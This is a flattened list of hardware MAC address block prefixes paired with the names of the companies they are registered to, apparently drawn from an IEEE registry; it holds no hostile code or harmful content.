PANGAEA SOLUTION INC 006967C Desird Design R&D C4954DE Canare Electric Co., Ltd. F8B568E ZAO "RADIUS Avtomatika" 4403773 Annapurna labs 4403770 Musashi Seimitsu Industry Co.,Ltd 4403775 Norden Communication UK Ltd. 440377A symplr 54A493B Advice 04D16E9 FUZHOU ZHUOYI ELECTRONIC CO.,LTD 04D16E2 s.d.i. s.p.a. 54A4937 RED Hydrogen LLC 54A4939 Do Easy International Limited 54A493A Wonders Technology Co., Ltd. 2085936 Eilersen Electric A/S 401175A BWT Tianjin Ltd. 4C4BF9D Shenzhen Haichuan Intelligent Information Technology Co., Ltd. 4C4BF9B Stored Energy Systems 2085933 UNILUMIN GROUP CO.,LTD 2415103 Kaiyun 2CD1412 IntelliLUM 9806378 Shenzhen Y&D Electronics Information Co., Ltd 2415106 SHANDONG KEHUI POWER AUTOMATION CO. LTD. 9806376 BOEING SSG 2C16BD9 Shanghai Walktech Information Technology Co.,Ltd. 2C16BD2 AIMCO 2C16BD7 SCT OPTRONICS CO., LTD 2C16BD0 Beijing Jishi Huitong Technology Co., Ltd. FCA47AD SHENZHEN KUKU TECHNOLOGY CO.,LTD FCA47A9 Oberix Group Pty Ltd FCA47A8 KARRY COMMUNICATION LIMITED 2C16BD1 Curtiss-Wright Drive Technology 2C16BD3 Saft AB D05F64D Shenzhen Canzone Technology Co.,Ltd. BC9740E B4ComTechnologies LLC BC97406 Shenzhen Colorwin Optical Technology Co.,Ltd BC97409 Direct Communication Solutions D0C8578 Nanjing Magewell Electronics Co.,Ltd D0C857C Dante Security Inc. D0C8570 YUAN High-Tech Development Co., Ltd. 8C593C1 Future Robot Technology Co., Limited 8C593C5 Spectranetix 8C593C8 Nanonord A/S B4A2EBD SALZBRENNER media GmbH B4A2EB8 SHENZHEN ZHUIFENGMA TECHNOLOGY CO., LTD BC97404 Wind Mobility Technology (Beijing) Co., Ltd 6095CE2 Q-SENTECH Co.,Ltd. 1C82592 Diatrend Corporation 1C82598 SHENZHEN AOA TECHNOLOGY CO.,LTD 1C8259E Microtronics Engineering GmbH BC9740A Amap Information Technology Co., Ltd BC9740C LISTEC GmbH 1C82599 Shanghai Xiaoyan Technology Co., Ltd. 848BCDC WORMIT B0FD0B7 Everynet Oy B0FD0B5 Taian Yuqi Communication Technology Co., Ltd B0FD0B9 Eagle Acoustics Manufacturing, LLC C82C2B5 DALCO AG C82C2B3 RF Engineering and Energy Resource C82C2B4 iWave Systems Tech Pvt Ltd 848BCD4 Logic Supply B0FD0B2 Vista Manufacturing FCD2B69 Winglet Systems Inc. 34E1D1D HI-TECH.ORG 34E1D1C CREW by True Rowing, Inc. CCD39DE Shanghai tongli information technology co. LTD E41E0A5 Aeroel srl E41E0A0 Zavod № 423 34E1D11 SAMA NextGen PTE Limited E41E0A7 Tritium Pty Ltd FCD2B62 Soma GmbH D47C44D Huaqin Telecom Technology Co.,Ltd. 4CBC988 Shenzhen Shanling Digital Technology Development Co.,Ltd. E44CC74 Beijing Zhongchuangwei Nanjing Quantum Communication Technology Co., Ltd. E44CC70 Alert Alarm AB E05A9F7 OMB Guitars LLC E05A9F1 AITEC SYSTEM CO., LTD. E44CC73 JSC "Svyaz Inginiring M" 4CBC984 Nemon Co., Ltd. E05A9FE ShenZhen Arts Changhua Intelligent Technology Co., Ltd D8860B2 Get SAT C4FFBCE viRaTec GmbH 38B19E4 Basalte BVBA CCD39D0 INX CO.,LTD. CCD39D2 Continental Control Systems CCD39DC Hangzhou Scooper Technology Co.,Ltd. D425CCB Veea D425CCD Combined Energy Technologies Pty Ltd 9C69B42 MOZI (Shenzhen) Artificial Intelligence Technology Co., Ltd. D425CC6 Nanjing LES Information Technology Co., Ltd 9C69B44 Globalcom Engineering SPA 6CDFFBA Guilin Zhishen Information TechonlogyCO.,Ltd 6CDFFB5 Greenbird Vertriebs GmbH 4C917A1 Inster Tecnología y Comunicaciones SAU 4C917A7 S.I.C.E.S. srl 9C69B43 Appareo Systems, LLC 6CDFFBC Toucan Systems Ltd 98F9C74 Promess GmbH 98F9C78 Renalsense A4580FC Homebeaver 98F9C71 HighSecLabs 98F9C70 SHENZHEN HUNTKEY ELECTRIC CO., LTD. 0CFE5D8 CTK Contact Electronics co., Ltd. 0CFE5DA Fujian Jieyu Computer Technology Co., Ltd. 6C5C3DE Clinton Electronics Corporation 0CFE5D2 Dspread International Co.,Limited 1CFD083 Umeox Innovations Co.,Ltd 1CFD087 sunweit industrial limited 3C6A2C7 Homegear GmbH 1CFD080 InSeat Solutions, LLC 1CFD08B guangzhou huiqun intelligent technology co. LTD 1CFD084 SABIK Offshore GmbH 1CFD082 HiHi Ltd 6C5C3D6 Hangzhou Netease Yanxuan Trading Co.,Ltd 6C5C3D1 Shenzhen Justek Technology Co., Ltd 3C6A2CE Beijing Donghua Hongtai Polytron Technologies Inc 3C6A2C0 Rio Lago Technologies LLC 300A60E Imageo s.r.o. 300A60D Sixth Energy Technologies Private Limited 300A605 A9 300A600 KAZUtechnica Co.,Ltd. 3C6A2C6 La Barrière Automatique A028334 Firm INFORMTEST Ltd. A4ED439 Heyuan intelligence technology CO.,Ltd A028337 Kryptus Information Security S/A A028339 IMESHX CORPORATION LIMITED A028335 JGR Optics Inc 9CF6DD3 RYEEX Technology Co.,Ltd. 9CF6DDC Lighting New Energy Technology Co., Ltd. C08359E Cyber Sciences, Inc. 3009F96 Beijing Mydreamplus Information Technology Co., Ltd. 3009F98 essence security 3009F97 Maytronics Ltd. 3009F9A Shenzhen Tencent Computer System Co., Ltd. C083599 Shenzhen Pay Device Technology Co., Ltd. 3009F95 VELSITEC-CLIBASE 9CF6DD8 Savari Inc 8489ECA Newell Brands 8489ECB EPSa Elektronik & Präzisionsbau Saalfeld GmbH C083592 Huaxin SM Optics Co. LTD. 04C3E6B Flintec UK Ltd. 04C3E65 Invasys 04C3E69 Ekin Teknoloji San ve Tic A.S. C083595 Viper Design, LLC 3C427E0 Grandway Technology (Shenzhen) Limited 04C3E63 Extech Electronics Co., LTD. D47C44A Tendzone International Pte Ltd D47C441 Innoviz Technologies LTD 3C427E4 Teknoware Oy D47C440 Exafore Oy D47C443 OMRON SENTECH CO., LTD. B44BD69 Qstar Technology Co,Ltd B44BD6E CHUNGHSIN INTERNATIONAL ELECTRONICS CO.,LTD. B44BD68 Arnouse Digital Devices Corp 2C48352 Rheonik Messtechnik GmbH A019B2A Adomi CCD31EE ShenZhenBoryNet Co.,LTD. 2C4835C Santec Corporation A019B24 Osatec 2C48359 SureFlap Ltd 8C1CDA2 GEOMC 8C1CDA6 LocoLabs LLC 2C48356 Exertus Oy 8C1CDAE Electronic Controlled Systems, Inc. 3C24F02 Laipac Technology Inc. 3C24F04 Inter-Coastal Electronics 8C1CDAC Alcidae Inc 0C73EBC Shenzhen Samchung Video Technology Co., Ltd. 3C24F03 Wisycom 3C24F00 SHENZHEN PINSIDA TECHNOLOGY CO.,LTD. 0C73EB9 Beijing L&S Lancom Platform Tech. Co., Ltd. 0C73EB1 EVERSEC TECHNOLOGY CORPORATION 0C73EB8 Beijing Miiiw Technology Co., Ltd 480BB22 Thales CETCA Avionics CO., Ltd 885FE8D zhejiang yuanwang communication technolgy co.,ltd 480BB2A XIAMEN RONGTA TECHNOLOGY CO.,LTD. 480BB27 Beijing Dragon Resources Limited. 885FE84 Beijing laiwei Technology Co.,Ltd 301F9AC Origami Group Limited 301F9A4 NCM Supplies, Inc. 301F9A7 Triax A/S F041C88 POSTIUM KOREA CO., LTD. 301F9AE Shenzhen Fengliyuan Energy Conservating Technology Co. Ltd B8D8128 Visual Productions BV 885FE8C Inor Process AB 88A9A7B TWK-ELEKTRONIK 88A9A7C AndroVideo Inc. 88A9A79 FlashForge Corporation 88A9A73 Mikroelektronika F041C80 LINPA ACOUSTIC TECHNOLOGY CO.,LTD 88A9A72 Honeywell spol. s.r.o. HTS CZ o.z. C4FFBC6 Shenzhen C & D Electronics Co., Ltd. C4FFBC8 ShenZhen ZYT Technology co., Ltd C4FFBC2 Mobiletron Electronics Co., Ltd C4FFBCC KyongBo Electric Co., Ltd. C4FFBCD Beijing KDF information technology co. LTD. C4FFBCA Advanced Navigation DCE5336 WECAN Solution Inc. A4DA226 AURANEXT 9C431E8 Wunda Group plc 9C431E3 Advanced Logic Technology (ALT) sa 9C431E5 ProMOS Technologies Inc. 282C026 Lookman Electroplast Industries Ltd 282C027 Telecom and Microelectonic Industries 282C029 Systec Intelligent Building Technology (Tianjin) Co.,Ltd. F8B568A SinePulse GmbH F8B568C 3SI Security Systems, Inc F8B5682 Shenzhen New-Bund Technology Co., Ltd. F8B5689 Beijing Wanji Techonology Co., Ltd. 9C431E9 "CONTINENT" Co. Ltd 9C431E6 R-S-I Elektrotechnik GmbH CO KG 282C023 Dexin Digital Technology Corp. Ltd. F8B5687 CloudMinds (Shenzhen) Holdings Co., Ltd 4048FD8 Dorel Juvenile 4048FD5 The 52nd Research Institute of China Electronic Technology Group Corporation 4048FDD NOX Systems AG 4048FD0 BEIJING C&W ELECTRONICS(GROUP)CO.,LTD 3873EA9 Lightform, Inc. EC9F0D6 Shenzhen Compare Electronics Co., Ltd EC9F0D8 Zhejiang HEJU Communication Technology Co., Ltd 3873EA6 Live Sentinel EC9F0D1 Simula Technology Inc. AC1DDF4 Motec Pty Ltd AC1DDF7 Green IT Korea Co., Ltd. AC1DDF5 Shenzhen Ouzheng Electronic Tech Co,.Ltd 34D0B8B OROSOUND SAS 741AE01 Socionext Inc. 2C279E7 FOCAL-JMLab 2C279E1 Electronique Bluewave Inc. 2C279EA Exegy Inc CC2237A shenzhen zonglian network technology limited 904E91B Shanghai JaWay Information Technology Co., Ltd. B8D8120 Glamo Inc. CC22379 E Ink Corp CC22378 Safilo S.p.A. 904E913 Teleepoch Ltd 904E91C Showtacle s.r.o. 189BA5E Taiwan Name Plate Co.,LTD 189BA55 Starfire Industries LLC 189BA5D legendsky tech 189BA5A SHENZHEN FIONEXX TECHNOLOGIES LTD. 189BA57 Beijing Xinertel Technology Co., Ltd. CC1BE00 Microtech System,Inc 189BA50 Dectris Ltd. 34298FD Keystone Electronic Solutions 28F537E Performance Motion Devices 28F5379 Herbert Waldmann GmbH & Co. KG 28F5376 MyOmega Systems GmbH 78D800B Maddalena S.p.A. 78D8005 Björkviks Consulting AB 78D8009 SightLine Applications 7CBACC7 Virgin Orbit F88A3CA Protos GmbH 7CBACCB Briowireless Inc. 7CBACCD SIGMA-ELEKTRO GmbH 4C65A85 TEL-Electronics Ltd F88A3C8 Cadmus Electronic Co.,Ltd. 4C65A84 Plus One Japan Limited F88A3C1 Carefree of Colorado F88A3C5 KOKKIA INC F88A3C6 Beijing Zhong Chuang Communication Technology Ltd. F88A3C4 GO-LINK TECHNOLOGY CO., LTD. 8C147DE Electrical & Automation Larsen & Toubro Limited 8C147DB Bausch Datacom NV/SA F023B9A Annapurna labs F023B93 BSP RUS Ltd. F023B91 Ubiant F023B9B Q Core Medical Ltd 04714BD Shenzhen BoClouds Technology Co.,Ltd. 40ED98A Integrated Design Ltd 8C147DD Shenzhen Lanxus technology Co. Ltd. 8C147D0 Nio A0C5F24 AiCare Corp. 08ED02E Telstra Corporation Limited 60D7E36 Ameli s.r.l. 04714B5 Bureau Electronique Appliquee 04714B3 Griesser Electronic AG 98AAFC0 Dalian Eastern Display Co., Ltd. 144FD7E Edan Instruments, Inc. 08ED02D Origami Energy Ltd 144FD75 FLS FINLAND OY 98AAFC1 SURTEC 144FD7D Shanghai B&A Technology Co., Ltd 144FD79 Emerson Network Power (India) Pvt. Ltd. A411635 Carbon, Inc. A41163D SHENZHEN ZHISHI TECHNOLOGY CO., LTD. 1CA0D30 OOO Tekhnotronika 40A36B6 Securiton AG A411637 SHENZHEN YIWANJIA INFORMATION TECHNOLOGY CO.,LTD A41163B Moog Music Inc. 40F3858 Teleepoch Ltd 40F3850 SubPac 8CC8F48 Strongbyte Solutions Limited 40F385A Creanord 40F385D Digital Bros S.p.A. 40F3852 Beijing Zongheng Electro-Mechanical Technology Development Co. 8CC8F4E Evaporcool Solutions 50A4D04 Raven Industries Inc. 8CC8F42 Dark Horse Connect LLC 8CC8F4C Shenzhen KSTAR Science and Technology Co., Ltd 50A4D0D Axel Technology 50A4D0A Changsha SinoCare, Inc 50A4D0E Sagetech Corporation 40ED982 A-IOX INC. A4580F1 Stone Lock Global, Inc. A4580F8 AIR LIQUIDE MEDICAL SYSTEMS 40ED981 GuangZhou FiiO Electronics Technology Co.,Ltd 40ED98C BloomSky,Inc. 34049E0 GoChip Inc. 34049E6 Life Interface Co., Ltd. 7CCBE2E Aplex Technology Inc. 7CCBE26 SY Electronics Limited 7CCBE29 Hangzhou Haohaokaiche Technology Co.,Ltd. A4580F9 Ksenia Security srl 500B910 Igor, Inc. 500B914 Sinope technologies Inc 7CCBE22 1000eyes GmbH 500B912 Annapurna labs 7CCBE25 DTECH Labs, Inc. 4865EE6 shenzhen sunflower technologies CO., LIMITED 244E7B7 Nanjing Wanlida Technology Co., Ltd. 4865EE0 DefPower Ltd 4CE1739 Shenzhen Evolution Dynamics Co., Ltd. AC64DDA Bluewave Global Manufacturing Limited AC64DD7 Wittmann Kunststoffgeräte GmbH AC64DD8 PFDC ELANCYL 1CC0E1D NewLand (NZ) Communication Tech Limited 1CC0E1B Exigent Sensors 4CE1731 Nexoforge Inc. 1CC0E19 Ospicon Company Limited AC64DD2 Shenzhen PuHua Technology Co., Ltd 383A211 HOBART GmbH F81D78E GUANGDONG ENOK COMMUNICATION CO., LTD. F81D787 WUHAN GUIDE INFRARED CO.,LTD 383A215 OOO NPP Uraltechnologiya 383A210 R3C Information(Shenzhen) Co.,Ltd. F81D78B SigmaConnectivityAB C0D3911 B9Creations 986D35C my-PV GmbH F0ACD7E Fiziico Co., Ltd. F0ACD7B Zhejiang Makepower Electronics,Inc. 2836385 CHARGELIB 2836386 Georg Neumann GmbH B0C5CA0 EM-Tech 8C192D6 smartHome Partner GmbH 1C87760 Dspread Technology (Beijing) Inc. 8C192DD Pyras Technology Inc. 8C192D0 Noritsu Precision Co., Ltd. 78CA83A Eksagate Elektronik Mühendislik ve Bilgisayar San. Tic. A.Ş. D0D94FC ARROWAVE TECHNOLOGIES LIMITED D0D94FA Shenzhen FDC Electuonic Co.,Ltd. CCD31E4 PJG Systementwicklung GmbH CCD31EC NantEnergy E0B6F52 Shanghai- British Information Technology Co., Ltd E0B6F59 Motiveprime Consumer Electronics Pvt Ltd E0B6F55 Shenzhen Civicom Technology Co.,Limited E0B6F5E Advatek Lighting Pty Ltd 2C265FC AATON DIGITAL 50FF993 Yongjing Shanghai Electronic Science and Technology 986D355 PDAHL 50FF995 Garrison Technology 7C477CE I-Convergence.com 38FDFE8 Indra Navia AS 38FDFE9 OOO Group of Industrial Technologies 7C477C4 RLC Electronics Systems 7C477C9 DaLian Cheering Tech Co.,Ltd 38FDFE0 Edge I&D Co., Ltd. 5CF2867 Access IS 38B8EBC Ajax Systems Inc 38B8EB9 NHS Sistemas de Energia 38B8EBA SECAD SA 38B8EB4 UMLOGICS 38B8EB0 Bumjin C&L Co., Ltd. 38FDFEB Swedish Adrenaline AB 38FDFEA Management Service Corporation 78CA834 Pinhole (Beijing) Technology Co., Ltd. 78CA833 Neofon GmbH 78CA832 APC 78CA836 Nomiku 1C8879D Beijing Raycores Technology Co.,Ltd 1C8879E Orion Labs inc 1C88794 Ultraflux 1C87748 Surtec Industries, Inc 1C8774A Nebbiolo Technologies 1C87749 Wide World Trade HK ltd. 1C87743 Silora R&D 1C87741 SIGFOX 1C8776D Qivivo 1C87766 philandro Software GmbH 1C87769 Tokyo Drawing Ltd. 1C87768 Guangzhou Video-Star Electronics Co.,Ltd. 1C87763 Unjo AB 1C87762 Ibeo Automotive Systems GmbH 1C87767 Corporate Systems Engineering 8439BE9 Guangdong SunMeng Information Technology Co. Ltd. 8439BE6 Shenzhen IP3 Century Intelligent Technology Co., Ltd 40A36BD FAOD Co.,Ltd. 1C87793 Visual Land Inc. 1C87790 Wurm GmbH & Co. KG Elektronische Systeme 70886BB Beijing Strongleader Science & Technology Co., Ltd. 70886BC MAX4G, Inc. 70886B0 Veracity UK Ltd 70886B4 HORI CO., LTD. 70886BA RHXTune Technology Co.,Ltd 40A36B2 TOPROOTTechnology Corp. Ltd. 800A801 Dongguan I-Chime electrinics Co.,Ltd CC1BE07 Sichuan Dianjia network technology Co.Ltd. CC1BE02 i-Trinetech Co.,Ltd. CC1BE0B ART&CORE Inc 0055DA0 Shinko Technos co.,ltd. C88ED1E Aventics GmbH 1C21D13 Microview Science and Technology Co.,Ltd 1C21D14 Scientific-Production Enterprise Dynamics A03E6B6 Wuhan Rui Ying Tong Network Technology Co., Ltd(China) A03E6B3 iLoda Solutions Limited C88ED10 AISWORLD PRIVATE LIMITED DC44279 Neusoft Corporation DC44275 Century Audio, Inc. A03E6B7 SinoGrid Software Systems Inc. 78C2C0E Huwomobility B0C5CAE Audio Elektronik İthalat İhracat San ve Tic A.Ş. B0C5CAD Private B0C5CAC XMetrics B0C5CA3 abode systems, inc. 74F8DB8 Songam Syscom Co. LTD. 74F8DB6 Shenzhen Melon Electronics Co.,Ltd B437D1D ZXY Sport Tracking 885D90D Hexaglobe 78C2C01 XRONOS-INC B437D1E Union Tecnologica Noxium S.L. 78C2C09 SES 74F8DBD Simon Electric (China) Co.,ltd B437D1B NSI Co., Ltd. 885D903 CPAC Systems 885D905 Shenzhen JingHanDa Electronics Co.Ltd 64FB816 XIMO Communication Technology Co., Ltd 885D900 FOSHAN HUAGUO OPTICAL CO.,LTD 549A11C Xi'an Hua Fan Technology Co.,Ltd. 549A116 Orient Direct, Inc. 807B85E Mersen 807B85D Kaynes Technology India Pvt Ltd 80E4DA5 CAVALRY STORAGE INC 80E4DA6 BroadMedia Co., Ltd. 64FB810 SHANGHAI SIMCOM LIMITED 1CCAE38 OxySec S.r.l. 1CCAE39 SHIN-YOSHA CORPORATION 1CCAE33 Shenzhen Smart Device Technology Co.,LTD 1CCAE34 Sunray Medical Apparatus Co.,Ltd. 80E4DAD Dalian Roiland Technology Co.,Ltd 2CD141B Resus Industries 1CCAE3E Dabi Atlante S/A Industrias Medico Odontológicas 2C6A6F8 Milbank Manufacturing Co. 2C6A6F5 SHEN ZHEN SIS SCIENCE & TECHNOLOGY LTD. 90C682B Lachmann & Rink GmbH 90C682C Li Seng Technology Ltd. 90C6825 S.A.E.T. S.R.L. 2C6A6FE EATON FHF Funke + Huster Fernsig GmbH 2CD1411 Ezee Systems Limited 9802D82 United Power Research Technology Corp. A0BB3ED Shenzhen Talent Technology company limited A0BB3EC Ewig Industries Macao Commercial Offshore Ltd 2C6A6F2 NanChang LangJie Technology Co.,Ltd 9802D8C AGV spa 9802D85 EBI Ltd. A0BB3E2 DirectOut GmbH 28FD806 Vigil Monitoring 28FD805 Xiaocong Network Limited 28FD80B Poket Hardware GmbH 28FD809 JINLITONG INTERNATIONAL CO.,LTD 28FD808 Jasco Products Company 2C265F9 Brüel & Kjaer Vibro GmbH F802786 Witium Co., Ltd 2C265FB Rexgen Inc. 2C265FD E Core Corporation F802788 EMBUX Technology Co., Ltd. 0CEFAF7 Syntrans AB A44F29C Shenzhen Huadoo Bright Group Limitied 0CEFAFE Infinisource Inc. 0CEFAFD CJSC «Svyaz Engineering» 3C39E7E MARPOSS SPA A44F299 Certi Networks Sdn Bhd A44F297 Protean Payment A44F298 Innovations in Optics, Inc. 3C39E76 RO.VE.R. Laboratories S.p.A 100723A TESSERA TECHNOLOGY INC. 3C39E70 Hannstar Display Corp E81863C Shenzhen Hipad Telecommunication Technology Co.,Ltd E81863D DIGITAL DYNAMICS, INC. 1007233 Tongfang computer co.Ltd. D02212D SHENZHEN ZHONGXI SECURITY CO.,LTD 1007239 Wireless input technology Inc. 1007234 Audio Engineering Ltd. E818635 WETEK ELECTRONICS LIMITED E4956E6 SHENZHEN JOYETECH ELECTRONICS CO., LTD. 74E14AE Diamond Kinetics 74E14AC Wuhan Shenghong Laser Projection Technology Co.,LTD 74E14A2 KLIMAT SOLEC Sp. z o.o. 74E14A0 Altenburger Electronic GmbH 74E14A1 Cerevo Inc. E4956E2 Shanghai Hoping Technology Co., Ltd. 74E14A6 Emerging Technology (Holdings) Ltd. B8D8127 Neuropace Inc. 58FCDB7 Prometheus Security Group Global, Inc. 58FCDB8 Shanghai Qianjin Electronic Equipment Co. Ltd 58FCDB5 Shenzhen Siecom Communication Technology Development Co.,Ltd. B01F81E Advanced & Wise Technology Corp. B01F818 Technion Oy B01F816 COMOTA Co., Ltd. 58FCDB1 Certis Technology International 58FCDB3 Custom Biogenic Systems 58FCDBC Excenon Mobile Technology Co., Ltd. BC66419 Shenzhen General Measure Technology Co., Ltd BC66415 Scientific Games BC66413 Solectria Renewables, LLC BC66410 InSync Technology Ltd 7C70BCE HOPERUN MMAX DIGITAL PTE. LTD. 7C70BCC Lukup Media 7C70BC9 dogtra 7C70BC8 Mennekes Elektrotechnik GmbH & Co. KG B01F811 Uvax Concepts B01F810 Dalian GigaTec Electronics Co.,Ltd F40E11D DXG Technology Corp. F40E114 Dayang Technology Development Inc. 141FBA9 Black Moth Technologies 7C70BC5 Canary Connect, Inc. 141FBA2 Deutsche Energieversorgung GmbH D076506 Picobrew LLC D076505 Annapurna Labs A43BFAD JSC “Component-ASU” A43BFA4 Maxon Australia D07650E Revox Inc. BC34004 Dexcel Design Pvt Ltd 7C70BC2 Digital Lumens A43BFA8 Alpwise 7419F8D Ansjer Electronics Co., Ltd. 90F421B Jiangsu MSInfo Technology Co.,Ltd. 8C147D1 Private B0FF722 MVT Elektrik Sanayi ve Ticaret Limited Sirketi 90F4216 Wuxi Sunning Smart Devices Co.,Ltd B0FF720 ShenYang LeShun Technology Co.,Ltd B0FF72A Simple Things BC31980 THINKCAR TECH CO.,LTD. BC31987 Zhejiang Delixi Electric Appliance Co., Ltd BC31982 JSC Megapolis-telecom region C86BBC4 Liuzhou Zuo You Trade Co., Ltd. C86BBCC ZEUS C86BBC3 Antevia Networks C86BBC7 Shenzhen smart-core technology co.,ltd. C86BBCE Waterkotte GmbH 68DA735 Shenzhen Xin hang xian Electronics Co., LTD 58C41E8 Xiaomi EV Technology Co., Ltd. 58C41E2 Truesense Srl 68DA730 Annapurna labs 68DA737 Haven Lighting 50482C8 Dongguan Amdolla Electric & Light Material Manufacture Co., Ltd 50482CB SL Process D015BB6 ShenZhen Zhongke GuanJie Data Technology Co.,Ltd. D015BB1 Jiangsu Eastone Technology Co.,Ltd B44D437 SERNET (SUZHOU) TECHNOLOGIES CORPORATION B44D435 halstrup-walcher GmbH 90F4214 Sansap Technology Pvt. Ltd. B44D43C SHENZHEN KOSKY TECHNOLOGY CO.,LTD. B44D43B Paulmann Licht GmbH 6C2ADFC VNETS INFORMATION TECHNOLOGY LTD. 6C2ADFD Sichuan Huidian Qiming Intelligent Technology Co.,Ltd 6C2ADF9 Simpleway Europe a.s. 1CA0D37 U-TX Technologies Ltd 7006928 JMA Wireless 58FCDBF Private 54083B1 Annapurna labs 64FB81F Private D07650F Private 54083B7 ASCS Sp. z o.o. 28FD80F Private 141FBAF Private 700692C ScoreBird, LLC 54083BA Silex Ipari Automatizálási Zrt. BC3400F Private 78C2C0F Private 100723F Private 807B85F Private A03E6BF Private 54083B6 Vector Atomic A43BFAF Private 7C70BCF Private E03C1CB Hangzhou Uni-Ubi Co.,Ltd. D016F02 RYSE Inc. D016F0D Top Guard Technologies D016F06 Tornado Modular Systems 74F8DBF Private BC6641F Private D093952 AT&T 5C6AECE Saab Seaeye Ltd 5C6AEC9 Shanghai Alway Information Technology Co., Ltd 5C6AEC0 Acuity Brands Lighting 7C45F96 HANK ELECTRONICS CO., LTD 7C45F9C Xemex NV 5C6AEC7 Nippon Pulse Motor Co., Ltd. 7C45F94 SPECS Surface Nano Analysis GmbH C0EAC39 OLEDCOMM 7C45F95 Interactive Technologies, Inc. C0EAC3A VOLT EQUIPAMENTOS ELETRONICOS LTDA 8C5DB2E Surbhi Satcom Pvt Ltd 8C5DB2C HEXIN Technologies Co., Ltd. 18D793C Private 8C5DB2A Beijing Scistor Technologies Co., Ltd 8C5DB2B NADDOD D014111 Private C4A559A Hebei Far-East Communication System Engineerning Co.,Ltd. 94C9B78 OSOM Products Inc 705A6FE Hall Technologies 705A6F9 Annapurna labs 84B3865 Fusus 0CCC47E Foxconn Brasil Industria e Comercio Ltda 84B3861 Sichuan Huakun Zhenyu Intelligent Technology Co., Ltd C4A5595 Moultrie Mobile C4A5596 Annapurna labs 84B3863 Phonesuite E0382D3 Annapurna labs E0382D0 Beijing Cgprintech Technology Co.,Ltd E0382D6 iTracxing E0382DC SiLAND Chengdu Technology Co., Ltd F0221D8 Shenzhen Glazero Technology Co., Ltd. F0221D5 Shenzhen SuyuVisonTechnology Co.,Ltd F0221D9 Shanghai Gfanxvision Intelligent Technology Co.Ltd F0221D7 Bulat Co., Limited D461376 Securus CCTV India D461371 Shenzhen smart-core technology co.,ltd. D461372 Robert Bosch Elektronikai Kft. D46137E UAB Brolis sensor technology D461373 APPOTRONICS CO., LTD 4C74A7C N3com D096869 Camfil 4C74A73 GoCodeIT Inc C498940 Shenzhen Megmeet Drive Technology Co.,Ltd. C498944 Alpine Electronics Marketing, Inc. D096861 PROVCOM LTD C498946 Aetina Corporation D4BABA4 Beijing Yuanxin Junsheng Technology Co.,ltd C483725 Wuhan Da Ta Technologies Co.,Ltd. C483729 Biwave Technologies, Inc. D420002 Shenzhen AI Develop & Manufacture Co.,LTD. C49894B Shanghai YVR Technology Co., Ltd. C483724 Transact Technologies Inc 5847CAD PRACTEK Technology Co., Ltd. 5847CA2 ONAWHIM (OAW) INC. 5847CA5 Huizhou Jiemeisi Technology Co., Ltd 5847CA7 Shenzhen Meigao Electronic Equipment Co.,Ltd 18C3F4E SHENZHEN MEGMEET ELECTRICAL CO., LTD 18C3F40 Scati Labs, S.A. 883CC57 KMtronic ltd 2C691D0 Hunan Xiangjiang Kunpeng Information Technology Co., Ltd. 2C691D2 Abode Systems Inc 2C691DD Ascentac Inc. 2C691DB Shenzhen Daren HI-Tech Electronics Co., Ltd. F490CBA Fend Incorporated 883CC50 Chengdu Data Sky Technology Co., Ltd. FC61796 Hangzhou LiDe Communication Co.,Ltd 303D512 Harman Connected Services Corporation India Pvt. Ltd. FC6179E ACCO Brands USA LLC 303D519 Annapurna labs 303D517 Destiny Automate Limited 8C51092 PROCET Technology Co., Ltd(HK) 8C5109C SpotterRF LLC FC61794 CHOEUNENG FC61793 EchoStar Mobile 0C7FEDE environmental systems corporation 0C7FED4 Purple Mountain ,Inc 0C7FED2 Tango Networks Inc 8002F4E Alfred Systems Inc 8002F4C Wuhan Glory Road Intelligent Technology Co., Ltd. 8002F41 Sichuan lookout environment protection technology co.,Ltd 7050E76 Nippon Pulse America, Inc. C4A10EC Focus-on 7050E7D Eta Compute Inc. 1C5974B Beijing Flintec Electronic Technology Co.,Ltd. 1C59744 Syntax technology(tianjin)Co.,LTD C4A10E5 O-NET Industrial Technologies (Shenzhen) Limited 6C1524B Annapurna labs 6C15242 Linkplay 1C59746 Square Inc. 6C15240 DEFA AS 6C1524C CORAL-TAIYI 6C15245 Shenzhen Electron Technology Co., LTD. 6C15248 ShenZhen Chainway Information Technology Co., Ltd. 0826AEA Flextronics International Kft 18A59C4 IT-1 18A59C8 Residence Control Ltd 1C59749 Shanghai Laisi Information Technology Co.,Ltd 381F26D HWACHANG CORPORATION 381F264 Airmaster A/S 18A59C2 Actiontec Electronics Inc. 3043D7C Xiaoniu network technology (Shanghai) Co., Ltd. 6C9308B Shenzhen EZpro Sound & Light Technology Co., Ltd. 6C93084 Estelar s.r.o 1054D22 ComNav Technology Ltd. 988FE00 Valinso B.V. 1054D21 Jiangxi Ofilm&Jvneng IoT Tech Co., Ltd. 0C86292 BADA SYSTEM co., Ltd 1054D2B Shenzhen Dinstech Technology Co.,Ltd. 1054D2D Sun wealth technology corporation limited 0C86297 HagerEnergy GmbH 0826AE7 EVTECH SOLUTIONS LTD. DBA 3D-P 988FE09 Nawon Machinery 988FE05 KuaiZhu SmartTechnology?Suzhou?CO.,Ltd 0826AE0 Wuhan Tianyu Information Industry Co., Ltd. DC36439 Hefei EA Excelsior Information Security Co., Ltd. 18D7934 Remote Engineer B.V. 18D7936 Autel lntelligent Technology Corp.,Ltd DC36435 Hangzhou Chingan Tech Co., Ltd. 04EEE81 Shanghai ZLAN Information Technology Co.,Ltd 04EEE87 Shenzhen C & D Electronics Co., Ltd. 94C9B7C Jinjin Technology (Shenzhen) Co., Ltd 94C9B77 MAMMOTHTEK CLOUD(DONG GUAN)TECHNOLOGY CO., LTD 94C9B76 Realtimes Beijing Technology Co., Ltd. 94C9B7D Dspread Technology (Beijing) Inc. 94C9B73 Sitronics JSC 50A0307 Shenzhen Hewang Electric Co.,Ltd 08F80DA MICKEY INDUSTRY,LTD. C8F5D69 Shanghai Mo xiang Network Technology CO.,ltd 50A0301 XEPIC Corporation Limited 50A030A Missing-Link Oy 08F80D2 Shanghai Mininglamp AI Group Co.,Ltd 08F80DB Vont Innovations 08F80D0 Huizhou changfei Optoelectruonics Technology Co.,Ltd 08F80D7 HANGZHOU YILI Communication Equipment Ltd 08F80D5 Zhejiang Luci Technology Co., Ltd 1845B35 ELPITECH LLC 1845B3E Sleep Number F4700C1 Shenzhen Excelland Technology Co., Ltd. 787264E Heltec Automation F4700C7 Changde xsound lnnovation technologies co;ltd. F4A4548 Shenzhen Cudy Technology Co., Ltd. 787264C Comcast-SRL 787264B digades GmbH 9880BB6 Neusoft Reach Automotive Technology (Shenyang) Co.,Ltd 9880BB0 RYEEX Technology Co.,Ltd. 7872645 CALTTA 